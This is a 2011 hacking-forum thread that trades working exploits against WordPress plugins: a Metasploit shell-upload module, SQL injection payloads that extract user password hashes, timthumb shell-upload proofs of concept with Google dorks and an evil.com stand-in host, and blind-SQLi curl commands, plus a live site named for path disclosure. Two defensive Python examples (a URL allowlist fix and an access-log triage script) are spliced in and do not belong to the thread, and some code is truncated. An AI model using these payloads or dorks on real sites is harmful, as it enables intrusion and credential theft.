#1
18.09.2011, 18:17
RexTiam
Regular
Registered: 02.11.2009
Posts: 341
Reputation: 65
Wordpress 1 Flash Gallery Plugin Arbitrary File Upload Exploit (MSF)

Quote:
Originally posted by None

Code:
# Google search: inurl:"wp-content/plugins/1-flash-gallery"
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => '1 Flash Gallery Wordpress Plugin File Upload Exploit',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability in
        the '1 Flash Gallery' Wordpress plugin.
      },
      'Author'         => [ 'Ben Schmidt' ],
      'License'        => MSF_LICENSE,
      'References'     => [ "http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as an HTTP
          # POST request, so it's possible this might be smaller (maybe?)
          # but very unlikely.
          'Space'       => 262144, # 256k
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { } ]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sept 6, 2011'
    ))

    register_options([
      OptString.new('URI', [true, "Path to Wordpress", "/"]),
    ], self.class)
  end

  def exploit
    boundary = rand_text_alphanumeric(6)
    fn = rand_text_alphanumeric(8)
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
    # (the remainder of the multipart body and the start of the first
    #  send_request_raw call did not survive extraction of the post)
    res = send_request_raw({
      'uri'     => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
        {
          'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
          'Content-Length' => data.length,
        }
    }, 25)

    if (res)
      print_status("Successfully uploaded shell.")
      shell_path = res.body.split("_")[0]
      print_status("Trying to access shell at #{shell_path}...")
      res = send_request_raw({
        'uri'    => datastore['URI'] + shell_path,
        'method' => 'GET',
      }, 0.01)
    else
      print_error("Error uploading shell")
    end

    handler
  end
end
 

#2
27.09.2011, 19:53
fl00der
Regular
Registered: 17.12.2008
Posts: 353
Reputation: 74
Guys, can anyone tell me whether there is an up-to-date WP plugin scanner that would let you find out which plugins are installed?
 

#3
27.09.2011, 19:58
_Spamer_
Learner
Registered: 03.02.2009
Posts: 49
Reputation: 403
fl00der/thread291666.html
 

#4
29.09.2011, 23:47
*AbramDubin
Newbie
Registered: 14.08.2005
Posts: 1
Reputation: 0
Can anyone point me to a good article on installing WP on IIS 7?
 

#5
30.09.2011, 19:08
Unknown
Newbie
Registered: 21.06.2005
Posts: 1
Reputation: 0
easy-color-manager #plugin# shell upload

easy-color-manager.php

PHP code:
...
// (the HTML markup of this template did not survive extraction of the post;
//  only the PHP fragments and the text nodes between them remain)
foreach (... background_part_array) as $key) {
    if ($this->background_part_array[$key]['type'] === 'navigation-02') {
        echo '' . $this->background_part_array[$key]['name'] . ' 背景';
        echo '' . $this->background_part_array[$key]['name'] . ' パネル';
    } else {
        echo '' . $this->background_part_array[$key]['name'];
    }
}
?>
" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...

shell:

Code:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj

glossy.admin.addEntry.php

PHP code:
...
$entryName       = $_POST['gs_entry_name'];
$entryTitle      = $_POST['gs_entry_title'];
$entryLink       = $_POST['gs_entry_link'];
$entryDimensions = $_POST['gs_entry_dimensions'];
$entryContents   = $_POST['gs_entry_contents'];

$saveEntry = gs_save_entry($entryName, $entryTitle, $entryLink, $entryDimensions, $entryContents, $pageAction, $entryOriginalName);

// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
if (empty($saveEntry))
{
    $completedAction = $pageAction;

    $pageAction = "Edit";
    $entryOriginalName = $entryName;
}
...

glossy.admin.addEntry.php

PHP code:
...
} else if ($entryAction == "Add" || $entryName != $entryOriginalName) {
    $query = $wpdb->prepare("SELECT gs_name FROM " . $gs_tableName . " WHERE gs_name = '%s';", $entryName);
    $existingName = $wpdb->get_var($query);

    if ($existingName)
    {
        $saveData = false;
        $errorFields['entryName'] = 'taken';
    }
}
...

exploit:

Code:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS

google.php

PHP code:
...
// (the HTML form markup between the PHP fragments below did not survive
//  extraction of the post; the string concatenations are what remains)
'.__("General options", 'menu-test' ).'
'.__("Active share buttons", 'menu-test' ).':
';

foreach ($active_buttons as $name => $text) {
    $checked = ($option['active_buttons'][$name]) ? 'checked="checked"' : '';
    $out .= '
    ' . __($text, 'menu-test' ).'&nbsp;&nbsp;';
}

$out .= '
'.__("Show buttons in these pages", 'menu-test' ).':
';

foreach ($show_in as $name => $text) {
    $checked = ($option['show_in'][$name]) ? 'checked="checked"' : '';
    $out .= '
    ' . __($text, 'menu-test' ).'&nbsp;&nbsp;';
}

$out .= '
'.__("Position", 'menu-test' ).':
'.__('before the post', 'menu-test' ).'
'.__('after the post', 'menu-test' ).'
'.__('before and after the post', 'menu-test' ).'
'.__("Google +1 options", 'menu-test' ).'
'.__("Button width", 'menu-test' ).':
px
'.__("default: 90", 'menu-test' ).'
'.__("Show counter", 'menu-test' ).':
...

Vulnerable input name "px", e.g. alert()

polylang #plugin# double sql-inj

languages-form.php

PHP code:
...
// (the opening tags of the input fields in this form template did not survive
//  extraction of the post; only the tails of the echoed values remain)
term_id; ?>" />
name; ?>" size="40" aria-required="true" />
description; ?>" size="40" aria-required="true" />
slug; ?>" size="40" />
...

admin.php

PHP code:
...
if (isset($_POST['lang'])) {
    // Update links to this language in posts and terms in case the slug has been modified
    $lang = $this->get_language($_POST['lang']);
    $old_slug = $lang->slug;
    if ($old_slug != $_POST['slug']) {
        // update the language slug in posts meta
        ...

exploit #1:

Code:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now

uninstall.php

PHP code:
...
$languages = get_terms('language', array('hide_empty' => false));
foreach ($languages as $lang) {
    // delete references to this language in all posts
    $args = array('numberposts' => -1, 'post_type' => 'any', 'post_status' => 'any');
    $posts = get_posts($args);
    foreach ($posts as $post) {
        delete_post_meta($post->ID, '_lang-' . $lang->slug);
    }

    // delete references to this language in categories & post tags
    $terms = get_terms(array('category', 'post_tag'), 'get=all');
    foreach ($terms as $term) {
        delete_metadata('term', $term->term_id, '_language');
        delete_metadata('term', $term->term_id, '_lang-' . $lang->slug);
    }

    // finally delete the language itself
    wp_delete_term($lang->term_id, 'language');
}

// delete the termmeta table only if it is empty as other plugins may use it
$table = $wpdb->termmeta;
$count = $wpdb->get_var("SELECT COUNT(*) FROM $table WHERE poly_id=$_GET['id']");
if (!$count) {
    $wpdb->query("DROP TABLE $table;");
    unset($wpdb->termmeta);
}
...

exploit #2:

Code:
http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--
 

#6
13.10.2011, 20:37
DeleTeeeX
Newbie
Registered: 19.05.2011
Posts: 26
Reputation: -1
Code:
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
 
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
 
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
 
Reference: http://www.exploit-db.com/exploits/17602/
 
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
 
# Plugin: Auto Attachments Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
 
# Plugin: WP Marketplace Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
 
# Plugin: DP Thumbnail Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
 
# Plugin: Vk Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
 
# Plugin: Rekt Slideshow Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
 
Must first base64 encode the URL.
 
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
 
# Plugin: CAC Featured Content Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
 
# Plugin: Rent A Car Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
 
 
# Plugin: LISL Last Image Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
 
# Plugin: Islidex Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
 
# Plugin: Kino Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
 
# Plugin: Cms Pack Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
 
# Plugin: A Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
 
# Plugin: Category List Portfolio Page Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
 
# Plugin: Really Easy Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
 
# Plugin: Verve Meta Boxes Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
 
# Plugin: User Avatar Wordpress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
 
Requires register_globals to be enabled and at least one user account to have an avatar directory.
 
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
 
# Plugin: Extend Wordpress Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
 
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
 
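The advisory above hinges on two things: an allowed-host check that accepts "blogger.com.evil.com" because it contains "blogger.com", and a cache file named external_md5(src).php that the web server will happily execute. The following is an added example, not code from the advisory, from timthumb or from any plugin named in it; it models timthumb's allowlist as a plain Python list (an assumption) and shows the substring check the advisory implies beside a replacement that matches hosts on dot boundaries, plus a cache-naming routine that takes the extension from the sniffed image type instead of hard-coding .php.

```python
"""Added example (not from the post or from timthumb itself): the two decisions that
determine whether a remote-fetching thumbnailer ends up serving attacker-controlled
bytes through the PHP interpreter.  The allowlist is modelled as a plain list
(assumption); naive_host_allowed reproduces the behaviour the blogger.com.evil.com
example implies, strict_host_allowed is the replacement."""
import hashlib
from urllib.parse import urlsplit

# Constructed allowlist in the spirit of timthumb's $allowedSites (assumption).
ALLOWED_SITES = ["blogger.com", "flickr.com", "wordpress.com"]


def naive_host_allowed(url, allowed=ALLOWED_SITES):
    """Substring match on the host: 'blogger.com.evil.com' contains 'blogger.com'."""
    host = (urlsplit(url).hostname or "").lower()
    return any(site in host for site in allowed)


def strict_host_allowed(url, allowed=ALLOWED_SITES):
    """Exact host or a dot-bounded subdomain of an allowed site, http(s) only, and
    no userinfo, so 'http://blogger.com@evil.com/' cannot be parsed in the
    attacker's favour."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == s.lower() or host.endswith("." + s.lower()) for s in allowed)


def detect_image_type(data):
    """Magic-byte sniff of the fetched body; returns 'gif', 'png', 'jpg' or None."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if data[:3] == b"\xff\xd8\xff":
        return "jpg"
    return None


def cache_filename(src, data):
    """The advisory's shells live at cache/external_<md5(src)>.php.  Naming the cache
    entry after the detected image type instead means bytes appended to a valid GIF
    are stored but never handed to the PHP interpreter.  Returns None when the
    fetched body is not an image at all, so nothing is written."""
    kind = detect_image_type(data)
    if kind is None:
        return None
    return "external_%s.%s" % (hashlib.md5(src.encode("utf-8")).hexdigest(), kind)


if __name__ == "__main__":
    probe = "http://blogger.com.evil.com/poc.gif"          # constructed host from the advisory
    print("naive :", naive_host_allowed(probe))            # True  (the weakness)
    print("strict:", strict_host_allowed(probe))           # False
    print(cache_filename(probe, b"GIF89a" + b"\x00" * 16 + b"trailing junk"))
```

The magic-byte check alone does not strip data appended to a real image; what makes the appended bytes harmless is that the stored file no longer has an extension the web server maps to PHP. Re-encoding the image with an image library before caching removes the trailing bytes as well.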

#7
13.10.2011, 20:49
DeleTeeeX
Newbie
Registered: 19.05.2011
Posts: 26
Reputation: -1
Code:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
 
---------------
Vulnerable code
---------------
    if (!isset($_POST['edit_post_submit'])) {
        $errormsg = apply_filters('wpwf_check_guestinfo',"");
        if ($errormsg != "") {
            $error = true;
            wp_die($errormsg);
        }
    }
 
    if($options['forum_captcha'] == true && !$user_ID){
        include_once(WPFPATH."captcha/shared.php");
        $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
            if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
              // do nothing
            }
            else {
                $error = true;
                $msg = __("Security code does not match", "mingleforum");
                wp_die($msg);
            }
    }
 
    ...
 
    if(isset($_POST['edit_post_submit'])){
        $myReplaceSub = array("'", "\\");
        $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
        $content = $mingleforum->input_filter($_POST['message']);
        $thread = $mingleforum->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id'];
 
        if($subject == ""){
            $msg .= "".__("An error occured", "mingleforum")."";
            $msg .= ("".__("You must enter a subject", "mingleforum")."");
            $error = true;
        }
        elseif($content == ""){
            $msg .= "".__("An error occured", "mingleforum")."";
            $msg .= ("".__("You must enter a message", "mingleforum")."");
            $error = true;
        }
 
        if ($error) wp_die($msg);
 
        //SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
        $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)
 

#8
13.10.2011, 20:55
DeleTeeeX
Newbie
Registered: 19.05.2011
Posts: 26
Reputation: -1
WordPress Collision Testimonials plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

Code:
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
    $id = $_GET['id'];
    mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
 
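Every issue collected in posts #1, #5, #6, #7 and #8 leaves a recognisable trace in the web server's access log: a POST to a plugin upload handler asking for a .php extension, a thumbnailer fetching a remote URL, SQL keywords in a query string, a direct hit on a plugin's uninstall.php, or a .php file being served with status 200 out of a cache/, uploads/ or temp/ directory. The script below is an added example, not code from any post in this thread: it parses constructed Apache-style lines (documentation IP ranges, paths taken from the posts, the md5 cache name replaced by a placeholder) and classifies each request. The rule names are mine.

```python
"""Added example (not from the thread): access-log triage for the request shapes
the posts describe.  SAMPLE_LOG is constructed; the IPs are documentation ranges."""
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2011:18:17:03 +0400] "POST /wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php HTTP/1.1" 200 41
203.0.113.7 - - [18/Sep/2011:18:17:04 +0400] "GET /wp-content/plugins/easycolmanager/uploads/shell.php HTTP/1.1" 200 12
198.51.100.9 - - [13/Oct/2011:20:37:10 +0400] "GET /wp-content/plugins/vk-gallery/lib/timthumb.php?src=http%3A%2F%2Fblogger.com.evil.com%2Fpoc.gif HTTP/1.1" 200 512
198.51.100.9 - - [13/Oct/2011:20:37:11 +0400] "GET /wp-content/plugins/vk-gallery/lib/cache/md5placeholder.php HTTP/1.1" 200 33
192.0.2.21 - - [30/Sep/2011:19:08:44 +0400] "GET /wp-content/plugins/polylang/uninstall.php?id=-1+union+select+1,2,3 HTTP/1.1" 200 7
192.0.2.21 - - [30/Sep/2011:19:09:01 +0400] "GET /wp-admin/admin.php?featQuote=1&id=1%20AND%20BENCHMARK(5000000%2CMD5(1)) HTTP/1.1" 200 0
10.0.0.5 - - [30/Sep/2011:19:10:00 +0400] "GET /wp-content/plugins/vk-gallery/lib/timthumb.php?src=wp-content/uploads/2011/09/photo.jpg&w=200 HTTP/1.1" 200 9000
10.0.0.5 - - [30/Sep/2011:19:10:01 +0400] "GET /2011/09/hello-world/ HTTP/1.1" 200 5100
"""

# Common log format without referer/user-agent (assumption about the log layout).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# SQL tokens used by the payloads in this thread; matched after URL-decoding so that
# '+' and '%20' both become spaces first.
SQLI_RE = re.compile(r'union\s+select|benchmark\s*\(|concat_ws\s*\(|group_concat\s*\(', re.I)

# PHP served from directories that should only ever hold data: a plugin's cache/,
# uploads/ or temp/ subtree, or anything under wp-content/uploads/.
PHP_IN_DATA_DIR_RE = re.compile(
    r'^/wp-content/(?:plugins/[^/]+/(?:.*/)?(?:cache|uploads|temp)|uploads)/.*\.php$', re.I)


def parse_line(line):
    """Return a dict with ip, method, path, decoded query and parsed params, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = unquote_plus(parts.query)
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Rule names that fire for one parsed request (empty list for benign traffic)."""
    hits = []
    path, query, params = rec["path"].lower(), rec["query"], rec["params"]

    # post #1: uploadify-style handler told to save the upload with a PHP extension
    exts = [e.lower() for e in params.get("fileext", [])]
    if rec["method"] == "POST" and path.endswith("/upload.php") and \
            any(e.startswith("php") or e == "phtml" for e in exts):
        hits.append("upload-handler-php-ext")

    # post #6: timthumb-style resizer asked to fetch a remote URL (local paths have no scheme)
    for src in params.get("src", []):
        if urlsplit(src).scheme in ("http", "https"):
            hits.append("remote-src-fetch")

    # posts #5, #7, #8: SQL keywords in the decoded query string
    if SQLI_RE.search(query):
        hits.append("sqli-tokens")

    # post #5 (polylang): a plugin's uninstall.php reached directly over HTTP
    if "/wp-content/plugins/" in path and path.endswith("/uninstall.php"):
        hits.append("plugin-uninstall-direct")

    # posts #1, #5, #6: a PHP file successfully served from a data directory
    if PHP_IN_DATA_DIR_RE.match(path) and rec["status"] == "200":
        hits.append("php-served-from-data-dir")
    return hits


def triage(log_text):
    """(rule, ip, path) for every rule that fires on every parsable line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append((rule, rec["ip"], rec["path"]))
    return findings


if __name__ == "__main__":
    for rule, ip, path in triage(SAMPLE_LOG):
        print("%-26s %-14s %s" % (rule, ip, path))
```

Feed it a real access log by replacing SAMPLE_LOG with the file contents. Note what the access log cannot show: the Mingle Forum payload in post #7 travels in the POST body (edit_post_id), so that class of request only becomes visible in a WAF or application log that records bodies; the "php-served-from-data-dir" rule is the one that still catches the follow-up, when the planted file is fetched.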

#9
19.10.2011, 02:14
SuNDowN
Forum member
Registered: 31.03.2008
Posts: 160
Reputation: 97
Has anyone played with this SQLi? I never managed to upload a shell; if it works for anyone, write back..
 

#10
19.10.2011, 21:03
pr3v3d
Newbie
Registered: 27.07.2010
Posts: 0
Reputation: 0
TUBEPRESS

Path disclosure in Wordpress in the Tubepress plugin

sait.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/

Code:
example: http://www.slapapp.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/
 
ANTICHAT ™ © 2001- Antichat Kft.